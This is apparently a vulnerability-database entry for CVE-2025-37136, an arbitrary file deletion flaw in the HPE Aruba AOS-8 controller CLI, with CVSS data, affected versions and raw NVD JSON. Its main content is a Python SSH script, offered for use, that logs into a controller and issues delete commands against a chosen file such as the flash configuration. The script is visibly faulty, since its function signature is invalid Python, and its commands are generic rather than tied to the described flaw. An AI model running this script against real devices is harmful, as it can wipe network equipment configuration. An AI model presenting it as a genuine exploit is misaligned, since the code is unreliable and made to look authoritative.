Security Vulnerability Report
中文
CVE-2025-37136 CVSS 6.5 MEDIUM

CVE-2025-37136

Published: 2025-10-14 17:15:40
Last Modified: 2025-11-12 21:09:45
Source: [email protected]

Description

Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
HPE Aruba Networking AOS-8 Controller(具体受影响的版本请参考HPE官方安全公告hpesbnw04957en_us)
HPE Aruba Networking AOS-8 Mobility Conductor(具体受影响的版本请参考HPE官方安全公告hpesbnw04957en_us)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37136 PoC - HPE AOS-8 CLI Arbitrary File Deletion # Vulnerability: Arbitrary file deletion via CLI command # Affected: HPE Aruba Networking AOS-8 Controller / Mobility Conductor # Requirements: Authenticated admin-level access import paramiko import sys def exploit_aruba_aos8(target_host, port=22, username, password, target_file): """ Exploit arbitrary file deletion vulnerability in HPE AOS-8 CLI Args: target_host: IP address of the Aruba controller port: SSH port (default 22) username: Admin username password: Admin password target_file: Path of file to delete (e.g., /flash/config.cfg) """ client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: # Connect to the Aruba controller via SSH client.connect( hostname=target_host, port=port, username=username, password=password, look_for_keys=False, allow_agent=False ) # Execute the malicious delete command via CLI # The vulnerability allows arbitrary file deletion through CLI commands commands = [ f"delete flash: {target_file}", f"file delete {target_file}", ] for cmd in commands: print(f"[*] Executing: {cmd}") stdin, stdout, stderr = client.exec_command(cmd) output = stdout.read().decode('utf-8', errors='ignore') error = stderr.read().decode('utf-8', errors='ignore') if output: print(f"[+] Output: {output}") if error: print(f"[-] Error: {error}") print(f"[+] File deletion attempt completed for: {target_file}") except paramiko.AuthenticationException: print("[-] Authentication failed. Valid admin credentials required.") except Exception as e: print(f"[-] Error: {str(e)}") finally: client.close() if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python3 exploit.py <target_ip> <username> <password> <target_file>") print("Example: python3 exploit.py 192.168.1.1 admin password123 /flash/config.cfg") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] file_to_delete = sys.argv[4] exploit_aruba_aos8(target, 22, user, passwd, file_to_delete)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37136", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:40.280", "lastModified": "2025-11-12T21:09:44.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.